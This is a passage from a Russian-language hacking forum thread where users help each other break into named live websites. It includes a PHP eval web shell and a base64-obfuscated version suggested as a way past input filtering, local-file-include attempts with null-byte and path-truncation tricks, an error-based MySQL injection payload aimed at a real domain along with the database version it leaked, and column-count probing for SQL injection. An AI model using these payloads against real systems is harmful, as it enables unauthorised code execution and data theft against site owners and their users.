Старый 26.05.2012, 22:20   #2041
Betepok
 
Регистрация: 06.01.2012
Сообщений: 14
Репутация: 3
По умолчанию

Цитата:
Сообщение от nomad Посмотреть сообщение
Есть локальный инклуд + phpinfo, использую скрипт https://rdot.org/forum/showpost.php?p=18024&postcount=11
Т.к. allow_url_fopen = off, "затащить" файл из-вне не могу. Решил записать скрипт вида
PHP код:
<? eval($_REQUEST[a]); ?>
, но при записи в файл остается только <? eval(); ?>
Почему так, и как можно это решить?
Попробуй так
<? eval(base64_decode("ZXZhbCgkX1JFUVVFU1RbYV0pOw")); ?>
Betepok вне форума   Ответить с цитированием
Старый 27.05.2012, 00:25   #2042
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

http://barifur.ru/index.php?m=/../../index.php%00
Инклуд... странный, нул байт вроде как фильтруется, но не привычным способом \0 а просто \ ставит... без нуля на конце, или может это не фильтрация вовсе, и потом с /././ так не получается никак ничё сделать.
В общем в данном случае можно что то придумать, или бесполезный LFI ?
Nightmare вне форума   Ответить с цитированием
Старый 27.05.2012, 09:31   #2043
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

Цитата:
Сообщение от Nightmare Посмотреть сообщение
http://barifur.ru/index.php?m=/../../index.php%00
Инклуд... странный, нул байт вроде как фильтруется, но не привычным способом \0 а просто \ ставит... без нуля на конце, или может это не фильтрация вовсе, и потом с /././ так не получается никак ничё сделать.
В общем в данном случае можно что то придумать, или бесполезный LFI ?
Там просто mq=on. Пробывал ///[4096/// или ///[2048/// слешей?
Ereeee вне форума   Ответить с цитированием
Старый 27.05.2012, 11:14   #2044
Nightmare
Banned
 
Регистрация: 06.07.2010
Сообщений: 162
Репутация: 10
По умолчанию

Цитата:
Сообщение от Ereeee Посмотреть сообщение
Там просто mq=on. Пробывал ///[4096/// или ///[2048/// слешей?
Не пробовал, а пытался попробовать, ибо данный способ у меня пока не сработал нигде, и мне не на что опираться, чтобы знать как выглядит успех.
Nightmare вне форума   Ответить с цитированием
Старый 27.05.2012, 14:54   #2045
boshin84
 
Регистрация: 27.05.2012
Сообщений: 2
Репутация: 0
По умолчанию

помогите со скл.

_http://reborn.ru/1'

в исходнике

Цитата:
<!-- Database error in Purga Engine 4.7 by Batman: Invalid SQL: SELECT sectionid FROM en_section WHERE urltitle='1''
mysql error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
mysql error number: 1064
Date: Sunday 27th 2012f May 2012 04:45:01 PM
Script: /1'
Referer:
-->
boshin84 вне форума   Ответить с цитированием
Старый 27.05.2012, 15:47   #2046
Tigger
 
Регистрация: 24.11.2010
Сообщений: 42
Репутация: 11
По умолчанию

http://reborn.ru/123'and(1)=(select*from(select(name_const(version( ),1)),name_const(version(),1))a)and(1)='1
mysql error: Duplicate column name '5.0.32-Debian_7etch1-log'
Tigger вне форума   Ответить с цитированием
Старый 30.05.2012, 12:45   #2047
fail
 
Регистрация: 09.07.2010
Сообщений: 19
Репутация: 0
По умолчанию

есть функция, используется для защиты от sql inj
PHP код:
function safe($var$lower true$punkt true)
{

    
$var trim(strip_tags($var));
    
$var preg_replace("/\s+/ms""-"$var);
    
$var str_replace("/""-"$var);

    if (
$punkt)
        
$var preg_replace("/[^a-z0-9\_\-.]+/mi"""$var);
    else
        
$var preg_replace("/[^a-z0-9\_\-]+/mi"""$var);

    
$var preg_replace('#[\-]+#i''-'$var);

    if (
$lower)
        
$var strtolower($var);

    if (
strlen($var) > 200) {

        
$var substr($var0200);

        if ((
$temp_max strrpos($var'-')))
            
$var substr($var0$temp_max);

    }

    return 
$var;

2,3 аргумент идут по умолчанию, можно ли обойти этот фильтр как то ?
fail вне форума   Ответить с цитированием
Старый 30.05.2012, 14:26   #2048
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от fail Посмотреть сообщение
есть функция, используется для защиты от sql inj
PHP код:
function safe($var$lower true$punkt true)
{

    
$var trim(strip_tags($var));
    
$var preg_replace("/\s+/ms""-"$var);
    
$var str_replace("/""-"$var);

    if (
$punkt)
        
$var preg_replace("/[^a-z0-9\_\-.]+/mi"""$var);
    else
        
$var preg_replace("/[^a-z0-9\_\-]+/mi"""$var);

    
$var preg_replace('#[\-]+#i''-'$var);

    if (
$lower)
        
$var strtolower($var);

    if (
strlen($var) > 200) {

        
$var substr($var0200);

        if ((
$temp_max strrpos($var'-')))
            
$var substr($var0$temp_max);

    }

    return 
$var;

2,3 аргумент идут по умолчанию, можно ли обойти этот фильтр как то ?
Код:
preg_replace("/[^a-z0-9\_\-.]+/mi", "", $var);
Не оставляет шансов.
__________________
|
Boolean вне форума   Ответить с цитированием
Старый 30.05.2012, 14:38   #2049
c0ncat
 
Регистрация: 29.05.2012
Сообщений: 8
Репутация: -1
По умолчанию

Вопрос по SQLi.
Допустим имеем сайт:

Цитата:
http://site.com/index.php?id=1
И параметр id уязвим.

Начинаю крутить:

Цитата:
http://site.com/index.php?id=-1+order+by+1--
http://site.com/index.php?id=-1+order+by+100--
http://site.com/index.php?id=-1+order+by+1000--
Невозможно определить количество полей.
Как в таком случае поступить?
c0ncat вне форума   Ответить с цитированием
Старый 30.05.2012, 14:48   #2050
Boolean
 
Регистрация: 19.10.2011
Сообщений: 111
Репутация: 34
По умолчанию

Цитата:
Сообщение от c0ncat Посмотреть сообщение
Невозможно определить количество полей.
Как вы это определили? Уверены, что запрос не многострочный?
__________________
|
Boolean вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot